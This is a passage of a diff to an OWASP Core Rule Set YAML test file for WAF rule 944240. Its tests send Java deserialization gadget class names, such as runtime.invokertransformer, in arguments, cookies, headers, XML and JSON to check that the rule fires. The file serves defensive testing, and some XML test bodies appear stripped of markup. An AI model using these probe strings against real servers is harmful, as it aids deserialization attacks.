"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.invokertransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-47 - desc: "Cookie name includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.invokertransformer=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-48 - desc: "Request header test includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.invokertransformer - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-49 - desc: "XML attribute value includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-50 - desc: "XML element value includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-51 - desc: "Nested XML element value includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-52 - desc: "Content-Type text/plain includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-53 - desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.invokertransformer\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-54 - desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.invokertransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-55 - desc: "Argument test includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-56 - desc: "Argument name includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-57 - desc: "Cookie test includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeclonefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-58 - desc: "Cookie name includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeclonefactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-59 - desc: "Request header test includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeclonefactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-60 - desc: "XML attribute value includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-61 - desc: "XML element value includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-62 - desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-63 - desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-64 - desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeclonefactory\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-65 - desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-66 - desc: "Argument test includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-67 - desc: "Argument name includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-68 - desc: "Cookie test includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeserializationfactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-69 - desc: "Cookie name includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeserializationfactory=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-70 - desc: "Request header test includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeserializationfactory - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-71 - desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-72 - desc: "XML element value includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-73 - desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-74 - desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-75 - desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeserializationfactory\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-76 - desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - - test_title: 944240-77 - desc: "Argument test includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-78 - desc: "Argument name includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "runtime.whileclosure=test" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-79 - desc: "Cookie test includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.whileclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-80 - desc: "Cookie name includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.whileclosure=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-81 - desc: "Request header test includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.whileclosure - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-82 - desc: "XML attribute value includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-83 - desc: "XML element value includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-84 - desc: "Nested XML element value includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-85 - desc: "Content-Type text/plain includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-86 - desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.whileclosure\"}" - output: - log_contains: "id \"944240\"" - - - - test_title: 944240-87 - desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"runtime.whileclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" +meta: + author: "spartantri" + enabled: true + name: "944240.yaml" + description: "Positive tests for rule 944240" +tests: + - test_title: 944240-1 + desc: "Argument test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-2 + desc: "Argument name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-3 + desc: "Cookie test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-4 + desc: "Cookie name includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-5 + desc: "Request header test includes keyword runtime.clonetransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 